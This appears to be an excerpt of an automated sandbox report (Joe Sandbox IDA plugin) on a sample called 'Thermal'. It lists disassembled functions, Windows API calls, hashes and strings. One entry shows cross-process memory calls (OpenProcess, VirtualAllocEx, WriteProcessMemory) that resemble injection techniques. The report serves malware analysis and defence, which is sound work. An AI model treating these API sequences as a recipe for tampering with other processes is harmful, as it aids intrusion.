                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                • String ID:
                                                • API String ID: 3824534824-0
                                                • Opcode ID: 27928953800677d86a74f307dcbc1162d14cfbadce48f1526ff2be7072fb5580
                                                • Instruction ID: 4038795740d86ca5367c1dc341a0d9e8b8af105537c26de3ea5256e0d8e3ebe4
                                                • Opcode Fuzzy Hash: 27928953800677d86a74f307dcbc1162d14cfbadce48f1526ff2be7072fb5580
                                                • Instruction Fuzzy Hash: FD1104B2908708BBCB518BA89C08B9B7BBDBB85321F14425AF915D3360D675C9448BF0
                                                APIs
                                                • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8E3C
                                                • GetLastError.KERNEL32(?,007C8900,?,?,?), ref: 007C8E46
                                                • GetProcessHeap.KERNEL32(00000008,?,?,007C8900,?,?,?), ref: 007C8E55
                                                • HeapAlloc.KERNEL32(00000000,?,007C8900,?,?,?), ref: 007C8E5C
                                                • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C8E73
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 842720411-0
                                                • Opcode ID: 5dbcaca1b63df50331fd012200aa5d7de4ce570dd8f27d741b549e7060f8b151
                                                • Instruction ID: 3fa3ec54635d6803eb55aecf6349b687d29442bd547154c4659db53040a18309
                                                • Opcode Fuzzy Hash: 5dbcaca1b63df50331fd012200aa5d7de4ce570dd8f27d741b549e7060f8b151
                                                • Instruction Fuzzy Hash: C0011D71601244BFDB614FA9DC49E6B7BADFF89755B10056DF849C2220DB329C50CF61
                                                APIs
                                                • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D581B
                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D5829
                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5831
                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 007D583B
                                                • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 007D5877
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                • String ID:
                                                • API String ID: 2833360925-0
                                                • Opcode ID: 5062601c18fe17b42b3bfce52969adcc9b11d8c156cbc2f22308089160d83d86
                                                • Instruction ID: 51c7f7fcab526f449ce18a9b19d5f79436462491fd06886c3faa4777dbcbe7bb
                                                • Opcode Fuzzy Hash: 5062601c18fe17b42b3bfce52969adcc9b11d8c156cbc2f22308089160d83d86
                                                • Instruction Fuzzy Hash: E7018C31D01A1DDBCF009FE4DC48AEDBBB8FF08711F004556E442B2241DB389594DBA1
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 007C8CDE
                                                • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 007C8CE8
                                                • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 007C8CF7
                                                • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 007C8CFE
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 007C8D14
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: 071f4301c58d72d21201029cea6d6c99a1789dc8b1ae44567dffa6f6e5002826
                                                • Instruction ID: 6532bdede67c62d693c176e1e53b8dd2d7dd27fbc42c7c0b0e4abc63b703f22f
                                                • Opcode Fuzzy Hash: 071f4301c58d72d21201029cea6d6c99a1789dc8b1ae44567dffa6f6e5002826
                                                • Instruction Fuzzy Hash: 8EF04935300208AFEB914FA59C89F6B3BADFF8D754F10452DF94AC61A0CA65AC41DF61
                                                APIs
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 007C8D3F
                                                • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D49
                                                • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D58
                                                • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D5F
                                                • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007C8D75
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: HeapInformationToken$AllocErrorLastProcess
                                                • String ID:
                                                • API String ID: 44706859-0
                                                • Opcode ID: 43adfbae9e1133ae13d0c872030845e9c3fd9b56210474d34ad0f81f7a021924
                                                • Instruction ID: 0e53c726f66a3b55721a6bdeba4c233d2b9b11aa5118b20ffabc8e846be7ac23
                                                • Opcode Fuzzy Hash: 43adfbae9e1133ae13d0c872030845e9c3fd9b56210474d34ad0f81f7a021924
                                                • Instruction Fuzzy Hash: 9DF03731240204AFEBA14FA5EC88F6B3BADFF89754F14412DF94A861A0CB659D41DBA1
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 007CCD90
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 007CCDA7
                                                • MessageBeep.USER32(00000000), ref: 007CCDBF
                                                • KillTimer.USER32(?,0000040A), ref: 007CCDDB
                                                • EndDialog.USER32(?,00000001), ref: 007CCDF5
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: 12c3ae2899926fbe03af411c19cf7728ebbe9e55bf1ec92052cfe14be87f903d
                                                • Instruction ID: a05e4e95e7c57ca362a062e3ddd6786c84ee5bf8f9ef40217806686e16b2104a
                                                • Opcode Fuzzy Hash: 12c3ae2899926fbe03af411c19cf7728ebbe9e55bf1ec92052cfe14be87f903d
                                                • Instruction Fuzzy Hash: 9B018630640704ABEB225B60DD4EFA67B7DFB10705F04066DF597A10E1DBF9A9548F80
                                                APIs
                                                • EndPath.GDI32(?), ref: 0077179B
                                                • StrokeAndFillPath.GDI32(?,?,007ABBC9,00000000,?), ref: 007717B7
                                                • SelectObject.GDI32(?,00000000), ref: 007717CA
                                                • DeleteObject.GDI32 ref: 007717DD
                                                • StrokePath.GDI32(?), ref: 007717F8
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                • String ID:
                                                • API String ID: 2625713937-0
                                                • Opcode ID: f6be4bcab285afa606526621273256a2d345f900e8774b4b3d14cb1b91de0d52
                                                • Instruction ID: 2885e656f30fd807a067adcbb8730a2b54010d0fa3f38d63b8aca4048517ec70
                                                • Opcode Fuzzy Hash: f6be4bcab285afa606526621273256a2d345f900e8774b4b3d14cb1b91de0d52
                                                • Instruction Fuzzy Hash: E6F03770008608EBDB659F2AEC4CB583FA4BB41362F44C624F92D441F0CB38CA96DF94
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 007DCA75
                                                • CoCreateInstance.OLE32(00803D3C,00000000,00000001,00803BAC,?), ref: 007DCA8D
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                • CoUninitialize.OLE32 ref: 007DCCFA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                • String ID: .lnk
                                                • API String ID: 2683427295-24824748
                                                • Opcode ID: 86dc33d5ab950de21101af445819ea8182fc4d1a40a10886d63b64e853f46fec
                                                • Instruction ID: d48ac8ecf9fb8d54651aadf4277680830323bc6da0a7764edbbc8ee95235434a
                                                • Opcode Fuzzy Hash: 86dc33d5ab950de21101af445819ea8182fc4d1a40a10886d63b64e853f46fec
                                                • Instruction Fuzzy Hash: 88A14A71104205EFD700EF64D885EABB7ECFF94354F00891CF19997292EB74AA09CBA2
                                                APIs
                                                  • Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
                                                  • Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031
                                                  • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                  • Part of subcall function 00781680: _memmove.LIBCMT ref: 007816DB
                                                • __swprintf.LIBCMT ref: 0077E598
                                                Strings
                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0077E431
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                • API String ID: 1943609520-557222456
                                                • Opcode ID: 88ed3c0ce77cfb2a5ad794e91e54c90fd324629ff67280dfc49cbbaa11ec9072
                                                • Instruction ID: 40cd1d48ae2ca625281419d7a0583d6da62c289d5c1b836bf31ab33c7529d935
                                                • Opcode Fuzzy Hash: 88ed3c0ce77cfb2a5ad794e91e54c90fd324629ff67280dfc49cbbaa11ec9072
                                                • Instruction Fuzzy Hash: 4F91CC71108301DFCB14FF24D899D6EB7A8EF89744F40491DF486972A1EA38EE05CB92
                                                APIs
                                                • __startOneArgErrorHandling.LIBCMT ref: 007952CD
                                                  • Part of subcall function 007A0320: __87except.LIBCMT ref: 007A035B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: ErrorHandling__87except__start
                                                • String ID: pow
                                                • API String ID: 2905807303-2276729525
                                                • Opcode ID: aca4168c297b6af11cd52e876542129f7608ff5c901b624b2a9c1eee93d765d5
                                                • Instruction ID: ffdebdd76f4207e488134fb75fb8f638f7ac6bda2625de3d9f7708d224628484
                                                • Opcode Fuzzy Hash: aca4168c297b6af11cd52e876542129f7608ff5c901b624b2a9c1eee93d765d5
                                                • Instruction Fuzzy Hash: 3B518C61E09A01C7CF12B724E95137A3BA0BB87750F304E58E4C1862E5EE7C8CD49BC6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: #$+
                                                • API String ID: 0-2552117581
                                                • Opcode ID: 53431f707e4e743c5af93c9fc8c9168bf8b4e3af0f4940d61751432cde7b9a24
                                                • Instruction ID: e9d388bd4bae27c0b7b2864b32ca8602c447a7cc74a7fd3c139f19ed60f1f966
                                                • Opcode Fuzzy Hash: 53431f707e4e743c5af93c9fc8c9168bf8b4e3af0f4940d61751432cde7b9a24
                                                • Instruction Fuzzy Hash: 43511075500246CFDF15EF68D884AFA7BE4EF55320F14005DE892AB290D738AC82CBA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memmove$_free
                                                • String ID: #Vx
                                                • API String ID: 2620147621-2004165239
                                                • Opcode ID: 1108e2f7c0ceec0ae627d1d388c59f3fc3220d03743dd332eaf29acfb6f6e750
                                                • Instruction ID: 37f500301ea41083e7901a2f80b901224e330880262bec80003f40fb833077d4
                                                • Opcode Fuzzy Hash: 1108e2f7c0ceec0ae627d1d388c59f3fc3220d03743dd332eaf29acfb6f6e750
                                                • Instruction Fuzzy Hash: 0E5159716087419FDB24CF28C481B6BBBE5BF89354F05896DE98987361E739E801CB92
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: _memset$_memmove
                                                • String ID: ERCP
                                                • API String ID: 2532777613-1384759551
                                                • Opcode ID: 4b9a67a2441beb51d484143927d310a28b787ac90eb3d13e01c6a83abead0beb
                                                • Instruction ID: 42fb56e5c62adaccd3ca3c04dd9c533377c3a08db1b4b67d7b9bea7357a9d5c2
                                                • Opcode Fuzzy Hash: 4b9a67a2441beb51d484143927d310a28b787ac90eb3d13e01c6a83abead0beb
                                                • Instruction Fuzzy Hash: B451D4B1940309DBDB34DF65C885BAABBF8EF04310F14856EE94ADB281E738D985CB50
                                                APIs
                                                  • Part of subcall function 007D1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9E4E,?,?,00000034,00000800,?,00000034), ref: 007D1CE5
                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007CA3F7
                                                  • Part of subcall function 007D1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007C9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 007D1CB0
                                                  • Part of subcall function 007D1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 007D1C08
                                                  • Part of subcall function 007D1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,007C9E12,00000034,?,?,00001004,00000000,00000000), ref: 007D1C18
                                                  • Part of subcall function 007D1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,007C9E12,00000034,?,?,00001004,00000000,00000000), ref: 007D1C2E
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007CA464
                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007CA4B1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                • String ID: @
                                                • API String ID: 4150878124-2766056989
                                                • Opcode ID: 199dee96d8d1bd405df6f889e44c5a079805cd121c6fa7aa4f2786b179002c6d
                                                • Instruction ID: 8f1f16c0b0b24227ae75922174f510a81c5ae0b95b8b47763115278a4b9c06e1
                                                • Opcode Fuzzy Hash: 199dee96d8d1bd405df6f889e44c5a079805cd121c6fa7aa4f2786b179002c6d
                                                • Instruction Fuzzy Hash: 4A412B7294021CBFDB14DBA4CD89FDEBBB8AF45300F004199FA55A7280DA756E45CBA1
                                                APIs
                                                • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 007F7A86
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 007F7A9A
                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 007F7ABE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window
                                                • String ID: SysMonthCal32
                                                • API String ID: 2326795674-1439706946
                                                • Opcode ID: a2a4274df0e3d9348bb86919dc5af231db6a719cd860f0f1c37bfb7b23197bb3
                                                • Instruction ID: 7f8ef58e1ae858985d48ba11ee2c6257df6cda74602b03b2eaea8800f96715a4
                                                • Opcode Fuzzy Hash: a2a4274df0e3d9348bb86919dc5af231db6a719cd860f0f1c37bfb7b23197bb3
                                                • Instruction Fuzzy Hash: 7321803261021DABDF158E54CC86FEE3B69EB48714F124214FF156B290DA75A851DBA0
                                                APIs
                                                • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 007F826F
                                                • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 007F827D
                                                • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 007F8284
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$DestroyWindow
                                                • String ID: msctls_updown32
                                                • API String ID: 4014797782-2298589950
                                                • Opcode ID: 39f85e46cc72f6a406d49e85a64987abb11bf803a5dcdfd51e7792424f18a8c2
                                                • Instruction ID: 541886a29d7c8f606390f6cbbfee19ff7462537d608af01f45881efd92c8235b
                                                • Opcode Fuzzy Hash: 39f85e46cc72f6a406d49e85a64987abb11bf803a5dcdfd51e7792424f18a8c2
                                                • Instruction Fuzzy Hash: 29218BB160420CAFDB50DF58CC85DB737ADFB9A394B080559FA109B351CB35EC11CAA1
                                                APIs
                                                • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 007F7360
                                                • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 007F7370
                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 007F7395
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 0000000B.00000002.3935787917.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935877648.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935954495.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 0000000B.00000002.3935979395.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_770000_Thermal.jbxd
                                                Similarity
                                                • API ID: MessageSend$MoveWindow
                                                • String ID: Listbox
                                                • API String ID: 3315199576-2633736733
                                                • Opcode ID: b1dbf78c3746b217782ad09fb1e071c81ddbf847923b9dfd7639432536d48b00
                                                • Instruction ID: 453fe0f061146c0e929433b038223514bef37dbd3456ce7fcda13e4557034629
                                                • Opcode Fuzzy Hash: b1dbf78c3746b217782ad09fb1e071c81ddbf847923b9dfd7639432536d48b00
                                                • Instruction Fuzzy Hash: 4A21CC32604118BFDF168F54CC85EBF37AAEF89764F118124FA149B290CA75AC51DBA0
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,007B027A,?), ref: 007EC6E7
                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007EC6F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.3935808865.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
